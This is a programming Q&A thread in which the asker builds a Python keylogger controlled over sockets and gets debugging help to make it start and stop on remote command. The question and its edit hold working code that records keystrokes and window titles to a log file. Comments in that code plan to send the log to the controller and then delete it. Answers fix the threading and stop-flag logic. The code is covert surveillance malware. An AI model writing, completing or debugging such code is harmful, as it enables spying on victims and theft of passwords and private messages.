# Python Socket function stopper

Tags: python, python-3.x, sockets

I am trying to make a keylogger with python sockets[educational purposes only of course]. But my question is: when I send from server to client the command activate keylogger, it will start the keylogger. But when I am finished with keylogging how can I send a 'stop keylogging' command to the slave to stop the keylogging. I was thinking of threading but really dont know what I could do with it. this is the "failing" code I made:

```
def mainkeylogg():
    stopmess = "GO"
    while stopmess == "GO":
        tmpwnm = GetWindowText(GetForegroundWindow())  # get the window name .
        Key = read_key();
        read_key()  # get key .
        if len(Key) >= 2:
            open("Log.txt", "a").write(  # MAYBE CHANGE 'A' TO 'WB'
                (f"[{tmpwnm}][{Key}]\n"))  # (if user press special key) save the key with window name
        else:
            open("Log.txt", "a").write((f"{Key}"))
    print("STOPPED THREAD")

t = threading.Thread(target=mainkeylogg)
t.start()
stopmess = (conn.recv(1024)).decode()  # CAUSES THE WHILE LOOP TO CLOSE?? DOESN'T WORK
if stopmess == "STOP":
    print("STOPPED")
message = "DONE"
conn.send(message.encode())
```

EDIT(working correct code for future people seeing this):

```
def mainkeylogg():
        global dead
        dead = False
        while not dead:
            tmpwnm = GetWindowText(GetForegroundWindow())  # get the window name .
            Key = read_key();
            read_key()  # get key .
            if len(Key) >= 2:
                open("Log.txt", "a").write(  # MAYBE CHANGE 'A' TO 'WB'
                    (f"[{tmpwnm}][{Key}]\n"))  # (if user press special key) save the key with window name
            else:
                open("Log.txt", "a").write((f"{Key}"))
        print("STOPPED THREAD")


    t = threading.Thread(target=mainkeylogg)
    t.start()
    message = "STARTED KEYLOGGER"
    conn.send(message.encode())


def stopkeylogger():
    stopmess = (conn.recv(1024)).decode()
    global dead
    if stopmess == "STOP":
        print("STOPPED")
        dead = True
        message = "STOPPED KEYLOGGER"
        conn.send(message.encode())
        #SEND LOG FILE
        # DELETE LOG FILE

    else:
        print("DIDNT STOP")
        message = "ERROR, DID NOT STOP KEYLOGGER"
        conn.send(message.encode())
```

Answer (score 0, accepted):

The biggest problem you have is here:

```
    t = threading.Thread(target-mainkeylogg())
```

Because you added the parens, that's going to call the function immediately, in the main thread.  That function won't ever return, so you don't even get to create the Thread object, much less flow on to the socket stuff.  Replace that with

```
    t = threading.Thread(target=mainkeylogg)
```

Pass the function, NOT the result of the function.

Beyond that, as long as you spell `stopmes` the same way every time (which you haven't here), the basic concept is fine.  Your main thread will block waiting for word from the socket.  Assuming the server actually sends "GO" as two letters without a newline, it should work.

Comment: Thanks for your comment! I edited the code but pycharm colors the _stopmess = (conn.recv(1024)).decode()_   grey so that means it doesn't get used. When running this with print statements I also get these results: the keylogger wont shut off with the stop (or any) command that is send. (It does receive the stopmess command but it doesn't use it in the mainkeylog function)

Comment: Of course.  Add `global stopmess` as the first statement in the function.  Or, better yet, don't initialize `stopmess` in the function , initialize it before you start the thread.  Then you don't need the `global`'.